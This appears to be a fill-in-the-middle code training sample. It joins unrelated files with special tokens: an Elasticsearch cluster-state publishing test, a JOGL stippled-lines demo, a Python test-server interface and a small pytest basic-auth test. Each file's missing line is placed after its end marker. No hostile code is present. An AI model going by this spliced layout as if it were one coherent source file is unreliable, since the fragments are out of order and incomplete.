ClusterState.builder(clusterState).incrementVersion().metaData(metaData).nodes(discoveryNodes).build(); listeners[i] = publishState(master.action, clusterState, previousState); } for (int i = 0; i < numberOfIterations; i++) { listeners[i].await(1, TimeUnit.SECONDS); } // set the master cs master.clusterState = clusterState; for (MockNode node : nodes.values()) { assertSameState(node.clusterState, clusterState); assertThat(node.clusterState.nodes().getLocalNode(), equalTo(node.discoveryNode)); } } public void testSerializationFailureDuringDiffPublishing() throws Exception { MockNode nodeA = createMockNode("nodeA", Settings.EMPTY, new ClusterStateListener() { @Override public void clusterChanged(ClusterChangedEvent event) { fail("Shouldn't send cluster state to myself"); } }).setAsMaster(); MockNode nodeB = createMockNode("nodeB", Settings.EMPTY); // Initial cluster state with both states - the second node still shouldn't get diff even though it's present in the previous cluster state DiscoveryNodes discoveryNodes = DiscoveryNodes.builder(nodeA.nodes()).put(nodeB.discoveryNode).build(); ClusterState previousClusterState = ClusterState.builder(CLUSTER_NAME).nodes(discoveryNodes).build(); ClusterState clusterState = ClusterState.builder(previousClusterState).incrementVersion().build(); publishStateAndWait(nodeA.action, clusterState, previousClusterState); assertSameStateFromFull(nodeB.clusterState, clusterState); // cluster state update - add block previousClusterState = clusterState; clusterState = ClusterState.builder(clusterState).blocks(ClusterBlocks.builder().addGlobalBlock(MetaData.CLUSTER_READ_ONLY_BLOCK)).incrementVersion().build(); ClusterState unserializableClusterState = new ClusterState(clusterState.version(), clusterState.stateUUID(), clusterState) { @Override public Diff<ClusterState> diff(ClusterState previousState) { return new Diff<ClusterState>() { @Override public ClusterState apply(ClusterState part) { fail("this diff shouldn't be applied"); return part; } @Override public void writeTo(StreamOutput out) throws IOException { throw new IOException("Simulated failure of diff serialization"); } }; } }; try { publishStateAndWait(nodeA.action, unserializableClusterState, previousClusterState); fail("cluster state published despite of diff errors"); } catch (Discovery.FailedToCommitClusterStateException e) { assertThat(e.getCause(), notNullValue()); assertThat(e.getCause().getMessage(), containsString("failed to serialize")); } } public void testFailToPublishWithLessThanMinMasterNodes() throws Exception { final int masterNodes = randomIntBetween(1, 10); MockNode master = createMockNode("master"); DiscoveryNodes.Builder discoveryNodesBuilder = DiscoveryNodes.builder().put(master.discoveryNode); for (int i = 1; i < masterNodes; i++) { discoveryNodesBuilder.put(createMockNode("node" + i).discoveryNode); } final int dataNodes = randomIntBetween(0, 5); final Settings dataSettings = Settings.builder().put(Node.NODE_MASTER_SETTING.getKey(), false).build(); for (int i = 0; i < dataNodes; i++) { discoveryNodesBuilder.put(createMockNode("data_" + i, dataSettings).discoveryNode); } discoveryNodesBuilder.localNodeId(master.discoveryNode.getId()).masterNodeId(master.discoveryNode.getId()); DiscoveryNodes discoveryNodes = discoveryNodesBuilder.build(); MetaData metaData = MetaData.EMPTY_META_DATA; ClusterState clusterState = ClusterState.builder(CLUSTER_NAME).metaData(metaData).nodes(discoveryNodes).build(); ClusterState previousState = master.clusterState; try { publishState(master.action, 
clusterState, previousState, masterNodes + randomIntBetween(1, 5)); fail("cluster state publishing didn't fail despite of not having enough nodes"); } catch (Discovery.FailedToCommitClusterStateException expected) { logger.debug("failed to publish as expected", expected); } } public void testPublishingWithSendingErrors() throws Exception { int goodNodes = randomIntBetween(2, 5); int errorNodes = randomIntBetween(1, 5); int timeOutNodes = randomBoolean() ? 0 : randomIntBetween(1, 5); // adding timeout nodes will force timeout errors final int numberOfMasterNodes = goodNodes + errorNodes + timeOutNodes + 1; // master final boolean expectingToCommit = randomBoolean(); Settings.Builder settings = Settings.builder(); // make sure we have a reasonable timeout if we expect to timeout, o.w. one that will make the test "hang"<|fim▁hole|> .put(DiscoverySettings.PUBLISH_TIMEOUT_SETTING.getKey(), "5ms"); // test is about committing MockNode master = createMockNode("master", settings.build()); // randomize things a bit int[] nodeTypes = new int[goodNodes + errorNodes + timeOutNodes]; for (int i = 0; i < goodNodes; i++) { nodeTypes[i] = 0; } for (int i = goodNodes; i < goodNodes + errorNodes; i++) { nodeTypes[i] = 1; } for (int i = goodNodes + errorNodes; i < nodeTypes.length; i++) { nodeTypes[i] = 2; } Collections.shuffle(Arrays.asList(nodeTypes), random()); DiscoveryNodes.Builder discoveryNodesBuilder = DiscoveryNodes.builder().put(master.discoveryNode); for (int i = 0; i < nodeTypes.length; i++) { final MockNode mockNode = createMockNode("node" + i); discoveryNodesBuilder.put(mockNode.discoveryNode); switch (nodeTypes[i]) { case 1: mockNode.action.errorOnSend.set(true); break; case 2: mockNode.action.timeoutOnSend.set(true); break; } } final int dataNodes = randomIntBetween(0, 3); // data nodes don't matter for (int i = 0; i < dataNodes; i++) { final MockNode mockNode = createMockNode("data_" + i, Settings.builder().put(Node.NODE_MASTER_SETTING.getKey(), false).build()); discoveryNodesBuilder.put(mockNode.discoveryNode); if (randomBoolean()) { // we really don't care - just chaos monkey mockNode.action.errorOnCommit.set(randomBoolean()); mockNode.action.errorOnSend.set(randomBoolean()); mockNode.action.timeoutOnCommit.set(randomBoolean()); mockNode.action.timeoutOnSend.set(randomBoolean()); } } final int minMasterNodes; final String expectedBehavior; if (expectingToCommit) { minMasterNodes = randomIntBetween(0, goodNodes + 1); // count master expectedBehavior = "succeed"; } else { minMasterNodes = randomIntBetween(goodNodes + 2, numberOfMasterNodes); // +2 because of master expectedBehavior = timeOutNodes > 0 ? "timeout" : "fail"; } logger.info("--> expecting commit to {}. good nodes [{}], errors [{}], timeouts [{}]. 
min_master_nodes [{}]", expectedBehavior, goodNodes + 1, errorNodes, timeOutNodes, minMasterNodes); discoveryNodesBuilder.localNodeId(master.discoveryNode.getId()).masterNodeId(master.discoveryNode.getId()); DiscoveryNodes discoveryNodes = discoveryNodesBuilder.build(); MetaData metaData = MetaData.EMPTY_META_DATA; ClusterState clusterState = ClusterState.builder(CLUSTER_NAME).metaData(metaData).nodes(discoveryNodes).build(); ClusterState previousState = master.clusterState; try { publishState(master.action, clusterState, previousState, minMasterNodes); if (expectingToCommit == false) { fail("cluster state publishing didn't fail despite of not have enough nodes"); } } catch (Discovery.FailedToCommitClusterStateException exception) { logger.debug("failed to publish as expected", exception); if (expectingToCommit) { throw exception; } assertThat(exception.getMessage(), containsString(timeOutNodes > 0 ? "timed out" : "failed")); } } public void testIncomingClusterStateValidation() throws Exception { MockNode node = createMockNode("node"); logger.info("--> testing acceptances of any master when having no master"); ClusterState state = ClusterState.builder(node.clusterState) .nodes(DiscoveryNodes.builder(node.nodes()).masterNodeId(randomAsciiOfLength(10))).incrementVersion().build(); node.action.validateIncomingState(state, null); // now set a master node node.clusterState = ClusterState.builder(node.clusterState).nodes(DiscoveryNodes.builder(node.nodes()).masterNodeId("master")).build(); logger.info("--> testing rejection of another master"); try { node.action.validateIncomingState(state, node.clusterState); fail("node accepted state from another master"); } catch (IllegalStateException OK) { assertThat(OK.toString(), containsString("cluster state from a different master than the current one, rejecting")); } logger.info("--> test state from the current master is accepted"); node.action.validateIncomingState(ClusterState.builder(node.clusterState) .nodes(DiscoveryNodes.builder(node.nodes()).masterNodeId("master")).incrementVersion().build(), node.clusterState); logger.info("--> testing rejection of another cluster name"); try { node.action.validateIncomingState(ClusterState.builder(new ClusterName(randomAsciiOfLength(10))).nodes(node.nodes()).build(), node.clusterState); fail("node accepted state with another cluster name"); } catch (IllegalStateException OK) { assertThat(OK.toString(), containsString("received state from a node that is not part of the cluster")); } logger.info("--> testing rejection of a cluster state with wrong local node"); try { state = ClusterState.builder(node.clusterState) .nodes(DiscoveryNodes.builder(node.nodes()).localNodeId("_non_existing_").build()) .incrementVersion().build(); node.action.validateIncomingState(state, node.clusterState); fail("node accepted state with non-existence local node"); } catch (IllegalStateException OK) { assertThat(OK.toString(), containsString("received state with a local node that does not match the current local node")); } try { MockNode otherNode = createMockNode("otherNode"); state = ClusterState.builder(node.clusterState).nodes( DiscoveryNodes.builder(node.nodes()).put(otherNode.discoveryNode).localNodeId(otherNode.discoveryNode.getId()).build() ).incrementVersion().build(); node.action.validateIncomingState(state, node.clusterState); fail("node accepted state with existent but wrong local node"); } catch (IllegalStateException OK) { assertThat(OK.toString(), containsString("received state with a local node that does not match the 
current local node")); } logger.info("--> testing acceptance of an old cluster state"); final ClusterState incomingState = node.clusterState; node.clusterState = ClusterState.builder(node.clusterState).incrementVersion().build(); final IllegalStateException e = expectThrows(IllegalStateException.class, () -> node.action.validateIncomingState(incomingState, node.clusterState)); final String message = String.format( Locale.ROOT, "rejecting cluster state version [%d] uuid [%s] received from [%s]", incomingState.version(), incomingState.stateUUID(), incomingState.nodes().getMasterNodeId() ); assertThat(e, hasToString("java.lang.IllegalStateException: " + message)); // an older version from a *new* master is also OK! ClusterState previousState = ClusterState.builder(node.clusterState).incrementVersion().build(); state = ClusterState.builder(node.clusterState) .nodes(DiscoveryNodes.builder(node.clusterState.nodes()).masterNodeId("_new_master_").build()) .build(); // remove the master of the node (but still have a previous cluster state with it)! node.resetMasterId(); node.action.validateIncomingState(state, previousState); } public void testOutOfOrderCommitMessages() throws Throwable { MockNode node = createMockNode("node").setAsMaster(); final CapturingTransportChannel channel = new CapturingTransportChannel(); List<ClusterState> states = new ArrayList<>(); final int numOfStates = scaledRandomIntBetween(3, 25); for (int i = 1; i <= numOfStates; i++) { states.add(ClusterState.builder(node.clusterState).version(i).stateUUID(ClusterState.UNKNOWN_UUID).build()); } final ClusterState finalState = states.get(numOfStates - 1); logger.info("--> publishing states"); for (ClusterState state : states) { node.action.handleIncomingClusterStateRequest( new BytesTransportRequest(PublishClusterStateAction.serializeFullClusterState(state, Version.CURRENT), Version.CURRENT), channel); assertThat(channel.response.get(), equalTo((TransportResponse) TransportResponse.Empty.INSTANCE)); assertThat(channel.error.get(), nullValue()); channel.clear(); } logger.info("--> committing states"); long largestVersionSeen = Long.MIN_VALUE; Randomness.shuffle(states); for (ClusterState state : states) { node.action.handleCommitRequest(new PublishClusterStateAction.CommitClusterStateRequest(state.stateUUID()), channel); if (largestVersionSeen < state.getVersion()) { assertThat(channel.response.get(), equalTo((TransportResponse) TransportResponse.Empty.INSTANCE)); if (channel.error.get() != null) { throw channel.error.get(); } largestVersionSeen = state.getVersion(); } else { // older cluster states will be rejected assertNotNull(channel.error.get()); assertThat(channel.error.get(), instanceOf(IllegalStateException.class)); } channel.clear(); } //now check the last state held assertSameState(node.clusterState, finalState); } /** * Tests that cluster is committed or times out. 
It should never be the case that we fail * an update due to a commit timeout, but it ends up being committed anyway */ public void testTimeoutOrCommit() throws Exception { Settings settings = Settings.builder() .put(DiscoverySettings.COMMIT_TIMEOUT_SETTING.getKey(), "1ms").build(); // short but so we will sometime commit sometime timeout MockNode master = createMockNode("master", settings); MockNode node = createMockNode("node", settings); ClusterState state = ClusterState.builder(master.clusterState) .nodes(DiscoveryNodes.builder(master.clusterState.nodes()).put(node.discoveryNode).masterNodeId(master.discoveryNode.getId())).build(); for (int i = 0; i < 10; i++) { state = ClusterState.builder(state).incrementVersion().build(); logger.debug("--> publishing version [{}], UUID [{}]", state.version(), state.stateUUID()); boolean success; try { publishState(master.action, state, master.clusterState, 2).await(1, TimeUnit.HOURS); success = true; } catch (Discovery.FailedToCommitClusterStateException OK) { success = false; } logger.debug("--> publishing [{}], verifying...", success ? "succeeded" : "failed"); if (success) { assertSameState(node.clusterState, state); } else { assertThat(node.clusterState.stateUUID(), not(equalTo(state.stateUUID()))); } } } private MetaData buildMetaDataForVersion(MetaData metaData, long version) { ImmutableOpenMap.Builder<String, IndexMetaData> indices = ImmutableOpenMap.builder(metaData.indices()); indices.put("test" + version, IndexMetaData.builder("test" + version).settings(Settings.builder().put(IndexMetaData.SETTING_VERSION_CREATED, Version.CURRENT)) .numberOfShards((int) version).numberOfReplicas(0).build()); return MetaData.builder(metaData) .transientSettings(Settings.builder().put("test", version).build()) .indices(indices.build()) .build(); } private void assertProperMetaDataForVersion(MetaData metaData, long version) { for (long i = 1; i <= version; i++) { assertThat(metaData.index("test" + i), notNullValue()); assertThat(metaData.index("test" + i).getNumberOfShards(), equalTo((int) i)); } assertThat(metaData.index("test" + (version + 1)), nullValue()); assertThat(metaData.transientSettings().get("test"), equalTo(Long.toString(version))); } public void publishStateAndWait(PublishClusterStateAction action, ClusterState state, ClusterState previousState) throws InterruptedException { publishState(action, state, previousState).await(1, TimeUnit.SECONDS); } public AssertingAckListener publishState(PublishClusterStateAction action, ClusterState state, ClusterState previousState) throws InterruptedException { final int minimumMasterNodes = randomIntBetween(-1, state.nodes().getMasterNodes().size()); return publishState(action, state, previousState, minimumMasterNodes); } public AssertingAckListener publishState(PublishClusterStateAction action, ClusterState state, ClusterState previousState, int minMasterNodes) throws InterruptedException { AssertingAckListener assertingAckListener = new AssertingAckListener(state.nodes().getSize() - 1); ClusterChangedEvent changedEvent = new ClusterChangedEvent("test update", state, previousState); action.publish(changedEvent, minMasterNodes, assertingAckListener); return assertingAckListener; } public static class AssertingAckListener implements Discovery.AckListener { private final List<Tuple<DiscoveryNode, Throwable>> errors = new CopyOnWriteArrayList<>(); private final AtomicBoolean timeoutOccurred = new AtomicBoolean(); private final CountDownLatch countDown; public AssertingAckListener(int nodeCount) { countDown = new 
CountDownLatch(nodeCount); } @Override public void onNodeAck(DiscoveryNode node, @Nullable Exception e) { if (e != null) { errors.add(new Tuple<>(node, e)); } countDown.countDown(); } @Override public void onTimeout() { timeoutOccurred.set(true); // Fast forward the counter - no reason to wait here long currentCount = countDown.getCount(); for (long i = 0; i < currentCount; i++) { countDown.countDown(); } } public void await(long timeout, TimeUnit unit) throws InterruptedException { assertThat(awaitErrors(timeout, unit), emptyIterable()); } public List<Tuple<DiscoveryNode, Throwable>> awaitErrors(long timeout, TimeUnit unit) throws InterruptedException { countDown.await(timeout, unit); assertFalse(timeoutOccurred.get()); return errors; } } void assertSameState(ClusterState actual, ClusterState expected) { assertThat(actual, notNullValue()); final String reason = "\n--> actual ClusterState: " + actual.prettyPrint() + "\n--> expected ClusterState:" + expected.prettyPrint(); assertThat("unequal UUIDs" + reason, actual.stateUUID(), equalTo(expected.stateUUID())); assertThat("unequal versions" + reason, actual.version(), equalTo(expected.version())); } void assertSameStateFromDiff(ClusterState actual, ClusterState expected) { assertSameState(actual, expected); assertTrue(actual.wasReadFromDiff()); } void assertSameStateFromFull(ClusterState actual, ClusterState expected) { assertSameState(actual, expected); assertFalse(actual.wasReadFromDiff()); } static class MockPublishAction extends PublishClusterStateAction { AtomicBoolean timeoutOnSend = new AtomicBoolean(); AtomicBoolean errorOnSend = new AtomicBoolean(); AtomicBoolean timeoutOnCommit = new AtomicBoolean(); AtomicBoolean errorOnCommit = new AtomicBoolean(); public MockPublishAction(Settings settings, TransportService transportService, Supplier<ClusterState> clusterStateSupplier, NewPendingClusterStateListener listener, DiscoverySettings discoverySettings, ClusterName clusterName) { super(settings, transportService, clusterStateSupplier, listener, discoverySettings, clusterName); } @Override protected void handleIncomingClusterStateRequest(BytesTransportRequest request, TransportChannel channel) throws IOException { if (errorOnSend.get()) { throw new ElasticsearchException("forced error on incoming cluster state"); } if (timeoutOnSend.get()) { return; } super.handleIncomingClusterStateRequest(request, channel); } @Override protected void handleCommitRequest(PublishClusterStateAction.CommitClusterStateRequest request, TransportChannel channel) { if (errorOnCommit.get()) { throw new ElasticsearchException("forced error on incoming commit"); } if (timeoutOnCommit.get()) { return; } super.handleCommitRequest(request, channel); } } static class CapturingTransportChannel implements TransportChannel { AtomicReference<TransportResponse> response = new AtomicReference<>(); AtomicReference<Throwable> error = new AtomicReference<>(); public void clear() { response.set(null); error.set(null); } @Override public String action() { return "_noop_"; } @Override public String getProfileName() { return "_noop_"; } @Override public void sendResponse(TransportResponse response) throws IOException { this.response.set(response); assertThat(error.get(), nullValue()); } @Override public void sendResponse(TransportResponse response, TransportResponseOptions options) throws IOException { this.response.set(response); assertThat(error.get(), nullValue()); } @Override public void sendResponse(Exception exception) throws IOException { this.error.set(exception); 
assertThat(response.get(), nullValue()); } @Override public long getRequestId() { return 0; } @Override public String getChannelType() { return "capturing"; } } }<|fim▁end|>
settings.put(DiscoverySettings.COMMIT_TIMEOUT_SETTING.getKey(), expectingToCommit == false && timeOutNodes > 0 ? "100ms" : "1h")
<|file_name|>LinesDemo.java<|end_file_name|><|fim▁begin|>import com.jogamp.opengl.*; import com.jogamp.opengl.awt.GLJPanel; import com.jogamp.opengl.fixedfunc.GLMatrixFunc; import com.jogamp.opengl.glu.GLU; import javax.swing.*; import java.awt.event.KeyEvent; import java.awt.event.KeyListener; import static com.jogamp.opengl.GL.GL_COLOR_BUFFER_BIT; import static com.jogamp.opengl.GL.GL_DEPTH_BUFFER_BIT; /** * This program demonstrates geometric primitives and their attributes. * * @author Kiet Le (Java port) Ported to JOGL 2.x by Claudio Eduardo Goes */ public class LinesDemo// // extends GLSkeleton<GLJPanel> implements GLEventListener, KeyListener { private GLU glu; // public static void main(String[] args) { // final GLCanvas glcanvas = createCanvas(); // // final JFrame frame = new JFrame("Basic Frame"); // // frame.getContentPane().add(glcanvas); // frame.setSize(frame.getContentPane().getPreferredSize()); // frame.setVisible(true); // // frame.repaint(); // } // public static GLCanvas createCanvas() { // final GLProfile profile = GLProfile.get(GLProfile.GL2); // GLCapabilities capabilities = new GLCapabilities(profile); // // final GLCanvas glcanvas = new GLCanvas(capabilities); // LinesDemo b = new LinesDemo(); // glcanvas.addGLEventListener(b); //// glcanvas.setSize(screenSize, screenSize); // // return glcanvas; // } // @Override protected GLJPanel createDrawable() {<|fim▁hole|> GLJPanel panel = new GLJPanel(caps); panel.addGLEventListener(this); panel.addKeyListener(this); return panel; } public void run() { GLJPanel demo = createDrawable(); JFrame.setDefaultLookAndFeelDecorated(true); JFrame frame = new JFrame("LinesDemo"); frame.setSize(400, 150); frame.setLocationRelativeTo(null); frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); frame.getContentPane().add(demo); frame.setVisible(true); demo.requestFocusInWindow(); } public static void main(String[] args) { new LinesDemo().run(); } public void init(GLAutoDrawable drawable) { GL2 gl = drawable.getGL().getGL2(); glu = new GLU(); // gl.glClearColor(0.0f, 0.0f, 0.0f, 0.0f); gl.glShadeModel(GL2.GL_FLAT); } public void display(GLAutoDrawable drawable) { GL2 gl = drawable.getGL().getGL2(); // int i; float coordinateSize = 300; // gl.glClear(GL.GL_COLOR_BUFFER_BIT); gl.glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT); // gl.glClearColor(1f, 1f, 1f, 1f); // gl.glMatrixMode(GLMatrixFunc.GL_PROJECTION); // gl.glLoadIdentity(); // gl.glOrtho(-coordinateSize, coordinateSize, -coordinateSize, coordinateSize, -1, 1); /* select white for all LinesDemo */ gl.glColor3f(1.0f, 1.0f, 1.0f); /* in 1st row, 3 LinesDemo, each with a different stipple */ gl.glEnable(GL2.GL_LINE_STIPPLE); gl.glEnable(GL2.GL_POINT_SMOOTH); gl.glBegin(GL2.GL_POINTS); gl.glPointSize(10e5f); gl.glVertex2i(200, 200); gl.glEnd(); gl.glDisable(GL2.GL_POINT_SMOOTH); gl.glLineStipple(1, (short) 0x0101); /* dotted */ drawOneLine(gl, 50.0f, 125.0f, 150.0f, 125.0f); gl.glLineStipple(1, (short) 0x00FF); /* dashed */ drawOneLine(gl, 150.0f, 125.0f, 250.0f, 125.0f); drawOneLine(gl, 150.0f, 125.0f, 250.0f, 200f); gl.glLineStipple(1, (short) 0x1C47); /* dash/dot/dash */ drawOneLine(gl, 250.0f, 125.0f, 350.0f, 125.0f); /* in 2nd row, 3 wide LinesDemo, each with different stipple */ gl.glLineWidth(5.0f); gl.glLineStipple(1, (short) 0x0101); /* dotted */ drawOneLine(gl, 50.0f, 100.0f, 150.0f, 100.f); gl.glLineStipple(1, (short) 0x00FF); /* dashed */ drawOneLine(gl, 150.0f, 100.0f, 250.0f, 100.0f); gl.glLineStipple(1, (short) 0x1C47); /* dash/dot/dash */ drawOneLine(gl, 250.0f, 
100.0f, 350.0f, 100.0f); gl.glLineWidth(1.0f); /* in 3rd row, 6 LinesDemo, with dash/dot/dash stipple */ /* as part of a single connected line strip */ gl.glLineStipple(1, (short) 0x1C47); /* dash/dot/dash */ gl.glBegin(GL.GL_LINE_STRIP); for (i = 0; i < 7; i++) gl.glVertex2f(50.0f + ((float) i * 50.0f), 75.0f); gl.glEnd(); /* in 4th row, 6 independent LinesDemo with same stipple */ for (i = 0; i < 6; i++) { drawOneLine(gl, 50.0f + ((float) i * 50.0f), 50.0f, 50.0f + ((float) (i + 1) * 50.0f), 50.0f); } /* in 5th row, 1 line, with dash/dot/dash stipple */ /* and a stipple repeat factor of 5 */ gl.glLineStipple(5, (short) 0x1C47); /* dash/dot/dash */ drawOneLine(gl, 50.0f, 25.0f, 350.0f, 25.0f); gl.glDisable(GL2.GL_LINE_STIPPLE); gl.glFlush(); } public void reshape(GLAutoDrawable drawable, int x, int y, int w, int h) { GL2 gl = drawable.getGL().getGL2(); // gl.glViewport(0, 0, w, h); gl.glMatrixMode(GL2.GL_PROJECTION); gl.glLoadIdentity(); glu.gluOrtho2D(0.0, (double) w, 0.0, (double) h); } public void displayChanged(GLAutoDrawable drawable, boolean modeChanged, boolean deviceChanged) { } private void drawOneLine(GL2 gl, float x1, float y1, float x2, float y2) { // gl.glBegin(GL.GL_LINES); gl.glVertex2f((x1), (y1)); gl.glVertex2f((x2), (y2)); // gl.glEnd(); } public void keyTyped(KeyEvent key) { } public void keyPressed(KeyEvent key) { switch (key.getKeyCode()) { case KeyEvent.VK_ESCAPE: System.exit(0); break; default: break; } } public void keyReleased(KeyEvent key) { } public void dispose(GLAutoDrawable arg0) { } }<|fim▁end|>
GLCapabilities caps = new GLCapabilities(null); //
<|file_name|>TestServerInterface.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python # -*- coding: utf-8 -*- # ------------------------------------------------------------------- # Copyright (c) 2010-2019 Denis Machard # This file is part of the extensive automation project # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, # MA 02110-1301 USA # ------------------------------------------------------------------- import threading import time from ea.libs.NetLayerLib import ServerAgent as NetLayerLib from ea.libs.NetLayerLib import Messages as Messages from ea.libs.NetLayerLib import FifoCallBack as FifoCallBack from ea.serverinterfaces import EventServerInterface as ESI from ea.serverinterfaces import AgentServerInterface as ASI from ea.libs import Logger, Settings class TestServerInterface(Logger.ClassLogger, NetLayerLib.ServerAgent): def __init__(self, listeningAddress, agentName='TSI', context=None): """ Constructs TCP Server Inferface @param listeningAddress: @type listeningAddress: """ NetLayerLib.ServerAgent.__init__(self, listeningAddress=listeningAddress, agentName=agentName, keepAliveInterval=Settings.getInt( 'Network', 'keepalive-interval'), inactivityTimeout=Settings.getInt( 'Network', 'inactivity-timeout'), responseTimeout=Settings.getInt( 'Network', 'response-timeout'), selectTimeout=Settings.get( 'Network', 'select-timeout'), pickleVer=Settings.getInt( 'Network', 'pickle-version') ) self.context = context self.__mutex__ = threading.RLock() self.__fifoThread = None self.tests = {} # {'task-id': Boolean} # test register, with background running or not self.testsConnected = {} # all tests connected def startFifo(self): """ Start the fifo """ self.__fifoThread = FifoCallBack.FifoCallbackThread() self.__fifoThread.start() self.trace("TSI: fifo started.") def stopFifo(self): """ Stop the fifo """ self.__fifoThread.stop() self.__fifoThread.join() self.trace("TSI: fifo stopped.") def registerTest(self, id, background): """ Register the test on the server @param id: @type id: @param background: @type background: boolean """ try: self.tests[str(id)] = bool(background) self.trace( 'Test=%s registered, running in Background=%s' % (id, background)) except Exception as e: self.error(err=e) return False return True def onConnection(self, client): """ Called on connection of the test @param client: @type client: """ NetLayerLib.ServerAgent.onConnection(self, client) self.testsConnected[client.client_address] = {'connected-at': time.time(), 'probes': [], 'agents': []} self.trace('test is starting: %s' % str(client.client_address)) def onDisconnection(self, client): """ Called on disconnection of test @param client: @type client: """ NetLayerLib.ServerAgent.onDisconnection(self, client) self.trace('test is endding: %s' % str(client.client_address)) def resetRunningAgent(self, client): """ Reset all running agents used by the client passed as 
argument @param client: @type client: """ self.trace('Trying to cleanup active agents') for p in client['agents']: # we can reset only agent in ready state (ready message received) if 'agent-name' in p: agent = ASI.instance().getAgent(aname=p['agent-name']) if agent is not None: self.trace('Reset Agent=%s for Script=%s and Adapter=%s' % (p['agent-name'], p['script-id'], p['source-adapter'])) data = {'event': 'agent-reset', 'script_id': p['script-id'], 'source-adapter': p['source-adapter'], 'uuid': p['uuid']} ASI.instance().notify(client=agent['address'], data=data) def onRequest(self, client, tid, request): """ Reimplemented from ServerAgent Called on incoming request @param client: @type client: @param tid: @type tid: @param request: @type request: """ self.__mutex__.acquire() try: _body_ = request['body'] if client not in self.testsConnected: self.__mutex__.release() return self.testsConnected[client]['task-id'] = _body_['task-id'] # handle notify and save some statistics on the database if request['cmd'] == Messages.RSQ_NOTIFY: try: if _body_['event'] in ['agent-data', 'agent-notify', 'agent-init', 'agent-reset', 'agent-alive', 'agent-ready']: if _body_['event'] == 'agent-ready': self.testsConnected[client]['agents'].append( { 'agent-name': _body_['destination-agent'], 'script-id': _body_['script_id'], 'uuid': _body_['uuid'], 'source-adapter': _body_['source-adapter'] } ) ASI.instance().notifyAgent(client, tid, data=_body_) except Exception as e: self.error('unable to handle notify for agent: %s' % e) if _body_['event'] == 'testcase-stopped': # reset agents self.resetRunningAgent(client=self.testsConnected[client]) if _body_['task-id'] in self.tests: if not self.tests[_body_['task-id']]: # check connected time of the associated user and test # if connected-at of the user > connected-at of the test # then not necessary to send events userFounded = self.context.getUser( login=_body_['from']) if userFounded is not None: if client not in self.testsConnected: self.error( 'unknown test from %s' % str(client)) else: if userFounded['connected-at'] < self.testsConnected[client]['connected-at']: if _body_['channel-id']: ESI.instance().notify(body=('event', _body_), toAddress=_body_['channel-id']) else: ESI.instance().notify(body=('event', _body_)) else: self.error('test unknown: %s' % _body_['task-id']) if _body_['event'] == 'script-stopped': # reset agents self.resetRunningAgent(client=self.testsConnected[client]) if _body_['task-id'] in self.tests: self.tests.pop(_body_['task-id']) else: self.error('task-id unknown: %s' % _body_['task-id']) if client in self.testsConnected: self.testsConnected.pop(client) else: self.error('test unknown: %s' % str(client)) # handle requests elif request['cmd'] == Messages.RSQ_CMD: self.trace("cmd received: %s" % _body_['cmd']) if 'cmd' in _body_: # handle interact command if _body_['cmd'] == Messages.CMD_INTERACT: self.trace('interact called') if _body_['task-id'] in self.tests: if not self.tests[_body_['task-id']]: # check connected time of the associated user and test # if connected-at of the user > connected-at of # the test then not necessary to send events userFounded = self.context.getUser( login=_body_['from']) if userFounded is not None: if client not in self.testsConnected: self.error( 'unknown test from %s' % str(client)) else: if userFounded['connected-at'] < self.testsConnected[client]['connected-at']: self.__fifoThread.putItem(lambda: self.onInteract(client, tid, bodyReq=_body_, timeout=_body_['timeout'])) else: self.error('test unknown: %s' % 
_body_['task-id']) else: self.error('cmd unknown %s' % _body_['cmd']) rsp = {'cmd': _body_['cmd'], 'res': Messages.CMD_ERROR} NetLayerLib.ServerAgent.failed( self, client, tid, body=rsp) else: self.error('cmd is missing') # handle other request else: self.trace('%s received ' % request['cmd']) except Exception as e: self.error("unable to handle incoming request: %s" % e) self.__mutex__.release() def onInteract(self, client, tid, bodyReq, timeout=0.0): """ Called on interact """ inter = Interact(client, tid, bodyReq, timeout=timeout) testThread = threading.Thread(target=lambda: inter.run()) testThread.start() def trace(self, txt): """ Trace message """ if Settings.instance() is not None: if Settings.get('Trace', 'debug-level') == 'VERBOSE':<|fim▁hole|>class Interact(object): def __init__(self, client, tid, bodyReq, timeout=0.0): """ Interact object, not blocking """ self.client = client self.tid = tid self.bodyReq = bodyReq self.timeout = timeout def run(self): """ On run """ rsp = ESI.instance().interact(body=self.bodyReq, timeout=self.timeout) _data_ = {'cmd': Messages.CMD_INTERACT} if rsp is None: _data_['rsp'] = None else: _data_['rsp'] = rsp['body'] instance().ok(self.client, self.tid, body=_data_) TSI = None def instance(): """ Returns the singleton @return: @rtype: """ return TSI def initialize(listeningAddress, context): """ Instance creation @param listeningAddress: @type listeningAddress: """ global TSI TSI = TestServerInterface(listeningAddress=listeningAddress, context=context) TSI.startFifo() def finalize(): """ Destruction of the singleton """ global TSI if TSI: TSI.stopFifo() TSI.stopSA() TSI = None<|fim▁end|>
Logger.ClassLogger.trace(self, txt=txt)
<|file_name|>test_authentication.py<|end_file_name|><|fim▁begin|>import pytest from flask_httpauth import HTTPBasicAuth from kapsi_git_manager.kgm import app from kapsi_git_manager import authentication as auth password = "password" username = "username" <|fim▁hole|> def test_verify_correct_password(): """ with the credentials file try to verify correct password combination """ with app.app_context(): assert auth.verify_pw(username, password) == True def test_verify_wrong_password(): """ with the credentials file try to verify wrong password combination. """ with app.app_context(): assert auth.verify_pw("winnie", "pooh") == False<|fim▁end|>
def test_auth_simple(): """ this is the idiot test to check whether anything in you auth system works. """ assert isinstance(auth.auth, HTTPBasicAuth)
